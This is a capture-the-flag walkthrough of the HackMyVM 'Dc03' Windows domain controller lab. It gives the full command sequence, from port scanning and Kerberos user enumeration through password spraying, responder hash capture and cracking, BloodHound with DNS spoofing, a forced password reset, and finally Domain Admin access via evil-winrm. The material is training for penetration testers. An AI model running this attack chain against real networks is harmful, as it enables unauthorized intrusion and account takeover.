Dc03November 23, 2024 Created by Page Difficulty OS josemlwdf HackMyVm Medium Windows I start with a scan of the open ports. nmap -p- --open --min-rate 5000 -sS -Pn 10.0.2.7 -oG scan I continue with a scan of the versions and technologies that are running on the open ports that we have found. nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49680,49722 -sCV -Pn 10.0.2.7 -oN ports Using kerbrute I search for valid users in the system. /opt/kerbrute_linux_386 userenum --dc 10.0.2.7 -d SOUPEDECODE.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt I check if with the found users I can access as password any of the users but I don’t get anything. netexec smb -u users_kerbrute -p users_kerbrute --continue-on-success 10.0.2.7 netexec smb -u users_kerbrute -p users_kerbrute --continue-on-success --no-brute 10.0.2.7 netexec winrm -u users_kerbrute -p users_kerbrute --continue-on-success 10.0.2.7 netexec winrm -u users_kerbrute -p users_kerbrute --continue-on-success --no-brute 10.0.2.7 After trying different things I listen to answer to sniff the traffic. responder -I eth0 -w -d I find a NTLMv2 hash that when I try to break with john I get the password of the user xkate578 in clear text. john --wordlist=/usr/share/wordlists/rockyou.txt hashNTLMv2 I validate with these credentials the folders I have access to via smb and IPC$ and share are the most important ones. Thanks to having read permissions on IPC$ I am able to enumerate the system. From the information obtained, my user and the user fbeth103 stand out because of the groups to which they belong. ldapdomaindump -u 'SOUPEDECODE.LOCAL\xkate578' -p jesuschrist 10.0.2.7 Moving on now to the share folder, I list its contents and I manage to read the first flag smbclient -U "SOUPEDECODE.LOCAL/xkate578%jesuschrist" //10.0.2.7/share I collect info with bloodhound-python to get another view of how the system is doing. At first it gives me a time failure and then another one with the dns server. To fix this second one I spoof the dns server on my machine with dnschef. dnschef --fakeip 10.0.2.7 ntpdate -u 10.0.2.7 ; bloodhound-python -u 'xkate578' -p 'jesuschrist' -ns 127.0.0.1 -d soupedecode.local -dc dc01.soupedecode.local --zip In this way I am able to extract the information and by deploying neo4j and bloodhound I am able to see graphically the relationships between users and groups. It does not suggest to me any way to make a lateral move or escalate privileges. I look for information about the group that user xkate578 belongs to, which is the one I have his credentials for, and I see that I can change the password to users. I try to change it to user fbeth103. impacket-changepasswd SOUPEDECODE.LOCAL/fbeth103@10.0.2.8 -altuser xkate578 -altpass jesuschrist -newpass Pepe123. -reset #It can also be done with rpcclient After changing the user’s password and verifying that the new credentials are correct, I notice that this user is a member of “Operators” and member of “Domain Admins”. Thanks to this I can connect to the system and read the second flag. evil-winrm -i 10.0.2.8 -u fbeth103 -p Pepe123.